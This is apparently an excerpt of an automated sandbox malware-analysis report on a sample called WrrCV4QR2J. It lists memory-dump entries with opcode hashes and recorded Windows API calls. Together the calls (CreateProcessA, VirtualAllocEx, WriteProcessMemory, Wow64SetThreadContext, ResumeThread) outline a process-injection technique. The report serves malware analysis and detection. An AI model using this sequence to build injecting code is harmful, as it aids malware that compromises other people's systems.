                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 525a0dac877f8cc9defd78a8a1f51a9d6233f5eddac065887b14db736ad98599
                                                                                                                                                              • Instruction ID: 90a753902683896df8b2c6a5b61280bcb5e5fc97229f492649ca798b6732a2a3
                                                                                                                                                              • Opcode Fuzzy Hash: 525a0dac877f8cc9defd78a8a1f51a9d6233f5eddac065887b14db736ad98599
                                                                                                                                                              • Instruction Fuzzy Hash: A3912570D0520ADFCB14CFA5D5A59EEFBB2FF89304F20952AD45AAB254D7309A06CF00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: c72229c46e303b8a9fe3cf424d2bc1c8335d6b48a1f250a1b4f0d5d6a42dde4c
                                                                                                                                                              • Instruction ID: 172369390d747e6e9b867c7085c03a84371ee4fc999ab8b476aa002b91beb845
                                                                                                                                                              • Opcode Fuzzy Hash: c72229c46e303b8a9fe3cf424d2bc1c8335d6b48a1f250a1b4f0d5d6a42dde4c
                                                                                                                                                              • Instruction Fuzzy Hash: D5914770E0520ADFCB18CFA5D5959DEFBB2EF89310F20952AD45AE7254D730AA06CF00
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $
                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                              • Opcode ID: 9d8679091530ba395fa9adfdbb90047f0d49202ccb320fbcb2dc57a0540d711e
                                                                                                                                                              • Instruction ID: edc6248d84fc490186be0c51d05668977f2059c087c4c924b19bde80fed61769
                                                                                                                                                              • Opcode Fuzzy Hash: 9d8679091530ba395fa9adfdbb90047f0d49202ccb320fbcb2dc57a0540d711e
                                                                                                                                                              • Instruction Fuzzy Hash: AE71C130920701CFDB08EF29D585595BBF1FF85304B5196A9E94AAB326EB71F894CF80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $
                                                                                                                                                              • API String ID: 0-227171996
                                                                                                                                                              • Opcode ID: 08888c231f1681a9df486dd6511ff92de53f08087b35bbdf3a12d11b071afb99
                                                                                                                                                              • Instruction ID: 66d916adbcc86e4d480354b89d2a6361e9b45603dfb6d00c6e572f618cb7cd77
                                                                                                                                                              • Opcode Fuzzy Hash: 08888c231f1681a9df486dd6511ff92de53f08087b35bbdf3a12d11b071afb99
                                                                                                                                                              • Instruction Fuzzy Hash: 1571F530920701CFDB08EF29C5856957BF1FF85304B5196A9E94AAB326EB71F894CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DB9196
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                              • Opcode ID: 642dc12d6532bbde9625c55b86e90f6e0231ba919c35434cfbe3267bc7588047
                                                                                                                                                              • Instruction ID: 04df673a2be6c30964542ea68e5641152e6ecdf0194add08810cf09d93f3c492
                                                                                                                                                              • Opcode Fuzzy Hash: 642dc12d6532bbde9625c55b86e90f6e0231ba919c35434cfbe3267bc7588047
                                                                                                                                                              • Instruction Fuzzy Hash: C6A16871D00259CFDB21CFA8C860BEDBBB2BF48314F1485A9E94AA7340DB749985CF91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02DB9196
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 963392458-0
                                                                                                                                                              • Opcode ID: 2fa96630c06138709a4aeaa615164381eb3f0dfc81d9d2c0590a51a42bb95b11
                                                                                                                                                              • Instruction ID: eeeabbfe3326d0da77dd76b34cf4ac3d9fcc69ff3e8c98233dc963e543020d31
                                                                                                                                                              • Opcode Fuzzy Hash: 2fa96630c06138709a4aeaa615164381eb3f0dfc81d9d2c0590a51a42bb95b11
                                                                                                                                                              • Instruction Fuzzy Hash: 80917871D00259CFEF21DFA8C860BDDBBB2AF48314F1485A9E909A7340DB749985CF92
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E3BB46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              • Opcode ID: b80cd29059584b4836f45b86bebe3dc9501d0d038ae48c95e38e4ab7397f2a67
                                                                                                                                                              • Instruction ID: 8b0269495a8d7ed8443a631528b71a1ce9f2230bbda229eba79c40d077b74ce3
                                                                                                                                                              • Opcode Fuzzy Hash: b80cd29059584b4836f45b86bebe3dc9501d0d038ae48c95e38e4ab7397f2a67
                                                                                                                                                              • Instruction Fuzzy Hash: 02814870A00B058FD725DF2AD5497AABBF1FF88309F008A2DD48AD7A50DB74E945CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E35DD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: 78da8a92efe2d2d7d39346fd8e150c90f2b9a73e6497508db73a6dc52ca8fb0f
                                                                                                                                                              • Instruction ID: e66cbc618de941f8f7fffb49fcfe7d517d7a631c6d0502ddb721e68561f0a627
                                                                                                                                                              • Opcode Fuzzy Hash: 78da8a92efe2d2d7d39346fd8e150c90f2b9a73e6497508db73a6dc52ca8fb0f
                                                                                                                                                              • Instruction Fuzzy Hash: 2D41F0B0C0061DCBDB25DFAAC888BDEBBF5BF49304F60806AD408AB251DB756945CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02E35DD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Create
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                              • Opcode ID: 0da2b32f3c8c2253af1322afa4674c77cbb6151f0fb1910cdc529993a6bd054f
                                                                                                                                                              • Instruction ID: 5a43fa353e956ee52e5df51825edf2b0c5f87481381ebba468b3fafe1d5e44fe
                                                                                                                                                              • Opcode Fuzzy Hash: 0da2b32f3c8c2253af1322afa4674c77cbb6151f0fb1910cdc529993a6bd054f
                                                                                                                                                              • Instruction Fuzzy Hash: 1D41D1B0C00619CBDB25CFA9C888BDEBBF5BF49304F64806AD448AB255DB756946CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DB8E48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 937 2db8cd3-2db8d26 939 2db8d28-2db8d34 937->939 940 2db8d36-2db8d75 WriteProcessMemory 937->940 939->940 942 2db8d7e-2db8dae 940->942 943 2db8d77-2db8d7d 940->943 943->942
                                                                                                                                                              APIs
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02DB8D68
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 948 2db8cd8-2db8d26 950 2db8d28-2db8d34 948->950 951 2db8d36-2db8d75 WriteProcessMemory 948->951 950->951 953 2db8d7e-2db8dae 951->953 954 2db8d77-2db8d7d 951->954 954->953
                                                                                                                                                              APIs
                                                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02DB8D68
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3559483778-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E3DD86,?,?,?,?,?), ref: 02E3DE47
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              control_flow_graph 959 2db8b38-2db8b8b 961 2db8b9b-2db8bcb Wow64SetThreadContext 959->961 962 2db8b8d-2db8b99 959->962 964 2db8bcd-2db8bd3 961->964 965 2db8bd4-2db8c04 961->965 962->961 964->965
                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB8BBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E3BBC1,00000800,00000000,00000000), ref: 02E3BDD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02DB8BBE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 983334009-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02DB8E48
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1726664587-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E3DD86,?,?,?,?,?), ref: 02E3DE47
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DuplicateHandle
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3793708945-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E3BBC1,00000800,00000000,00000000), ref: 02E3BDD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E3BBC1,00000800,00000000,00000000), ref: 02E3BDD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DB8C86
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02DB8C86
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02E3BB46
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1684014072.0000000002E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E30000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2e30000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleModule
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4139908857-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 02DBA515
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 02DBA515
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePost
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 410705778-0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              • Instruction Fuzzy Hash: D2410575A0020ADFCB44DF69D98499EFBB5FF49310B14C699E918AB311E730A985CF90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 5b53d248c607d64dbf2d257bed6dca77b473e4e1e82b8b1ed8d19dedc0d84e17
                                                                                                                                                              • Instruction ID: c1d25a5d270c36649a543d5df37e119d6114c482cf9df3a1b06fec0822ad4834
                                                                                                                                                              • Opcode Fuzzy Hash: 5b53d248c607d64dbf2d257bed6dca77b473e4e1e82b8b1ed8d19dedc0d84e17
                                                                                                                                                              • Instruction Fuzzy Hash: 213191313042009FD748EF6DD584AA777FAFBC8211B2484AAE60ACB365DF30DC458B51
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: a4774ce1b1cca0f97b3b59279f1e2392792250d8e5e618f729c32bb71be132a7
                                                                                                                                                              • Instruction ID: 1347e789da2dc35c6e4ff26af21347dcfc4ad1feb174d67bbc285aed4c496e54
                                                                                                                                                              • Opcode Fuzzy Hash: a4774ce1b1cca0f97b3b59279f1e2392792250d8e5e618f729c32bb71be132a7
                                                                                                                                                              • Instruction Fuzzy Hash: 102185323542018FDB54DB2CD8849A97BEAFF89711B1984B6E10ACF3B6DA35DC058790
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 1e7571df014bbee13f0bd6eb1960e64c4c7a86780b3a944e2139a44b42c75601
                                                                                                                                                              • Instruction ID: d388ba3fc9620793ecb8d43c1f672424fe3a0a5c3c01152399375f390d1bb544
                                                                                                                                                              • Opcode Fuzzy Hash: 1e7571df014bbee13f0bd6eb1960e64c4c7a86780b3a944e2139a44b42c75601
                                                                                                                                                              • Instruction Fuzzy Hash: 7131D975A00609CFDB15DFA8C440A9DFBF1FF49310F1486AAE659A7221E7309985CB41
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685991073.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_54f0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e1cc03fe2484bc393091ce9f7c6750c7cee290d1c7f12ac52848c39541ad1442
                                                                                                                                                              • Instruction ID: a3e4025f5ca8bef6b35827175dc7246d1cfb400d3a71d5637c8f8ee705dc18e4
                                                                                                                                                              • Opcode Fuzzy Hash: e1cc03fe2484bc393091ce9f7c6750c7cee290d1c7f12ac52848c39541ad1442
                                                                                                                                                              • Instruction Fuzzy Hash: 7B311634B141148FDB00DB6AD498EADBBF6BF49705F1440AAE609EB361DB71D841CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
